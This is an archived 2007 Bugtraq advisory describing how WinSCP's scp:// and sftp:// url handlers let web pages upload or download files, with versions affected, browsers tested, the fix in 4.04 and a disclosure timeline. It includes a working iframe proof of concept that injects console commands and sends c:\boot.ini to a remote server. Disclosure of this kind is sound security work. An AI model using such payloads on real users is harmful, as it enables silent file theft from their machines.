lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070913112232.10597.qmail@securityfocus.com>
Date: 13 Sep 2007 11:22:32 -0000
From: Kender.Security@...il.com
To: bugtraq@...urityfocus.com
Subject: WinSCP < 4.04 url protocol handler flaw

-Affected products: WinSCP 4.03 and older

-Details:
By default WinSCP installs url protocol handlers for the scp:// and sftp:// protocols.
These could be used by malicious web content to automatically upload any file from the local system to a remote server, or automatically  download files from a remote server to the local system.

Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack.

-PoC:
On a machine you control set up an scp-only account with the username "scp" with any password.
Place this on a website:
<iframe src='scp:password@...rhost.com:" /console /command "option confirm off" "put c:\boot.ini" close exit "'/>
This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current user also works.

-Tested on:
IE6 & IE7 works.
FF older than 2.0.0.5 works.
FF 2.0.0.5 and newer show a confirmation dialog before executing WinSCP.

-Solution
Upgrade to version 4.04 or higher from http://winscp.net/download.php

-Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ